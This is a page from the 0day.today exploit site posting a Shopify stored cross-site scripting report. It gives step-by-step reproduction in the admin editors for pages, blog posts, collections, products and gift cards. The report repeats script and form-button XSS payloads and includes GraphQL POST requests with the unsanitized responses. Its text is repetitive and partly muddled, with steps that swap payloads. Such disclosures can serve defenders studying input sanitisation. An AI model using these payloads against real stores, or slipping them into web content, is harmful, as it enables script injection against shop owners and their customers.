0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Shopify Cross Site Scripting Vulnerability
Correspondence from Shopify declined to comment regarding new discovered vulnerabilities within their website. Although 'frontend' vulnerabilities are considered out of scope, person/tester foundhimself a beefy bugbounty from the same page that has been listed below, including similar functionality that has not been tested yet. Two emails and several reports, the 'hacker-1' staff reject the bid for findings. Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of tags from <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> 1. Browse to Online Store 2. Select Pages -> Add Page 3. Set Title -> Title_Name 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "page":{"bodyHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name" [...] Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title -> Content -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p><form><button formaction="javascript:javascript:alert(1)">X</button></form></p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Online Store 2. Select Blog Posts -> Add Blog Post 3. Set Title -> Blog_Title 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2" [...] Products -> Collections -> Create Collection -> Title -> Product_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p><form><button formaction="javascript:javascript:alert(1)">X</button></form></p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Collections -> Create Collection 3. Set Title -> Collection_Title 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "collection":{"title":"Collection_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>" [...] Products -> Inventory -> View Products -> Double Click on Product -> Title -> Inventory_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p><form><button formaction="javascript:javascript:alert(1)">X</button></form></p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Inventory-> View Products 3. Select Product -> Title -> Product_Title 4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>","workflow":"product-details-update" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>" [...] Products -> Add Product -> Title -> Product_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p><form><button formaction="javascript:javascript:alert(1)">X</button></form></p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Add Product -> Title -> Product_Title 3. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 4. Select Show HTML 5. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"<p>&nbps;</p>...\"><script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n</code></pre>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title","><script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n</code></pre>", [...] Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p><form><button formaction="javascript:javascript:alert(1)">X</button></form></p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Gift Cards 3. Add Gift Card Products -> Gift_Title 4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>" [...] 1. Browse to /admin/pages 2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload 3. Online Store -> Pages -> Add Page -> <form><button formaction="javascript:javascript:alert(1)">X</button></form> https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications # 0day.today [2024-10-06] #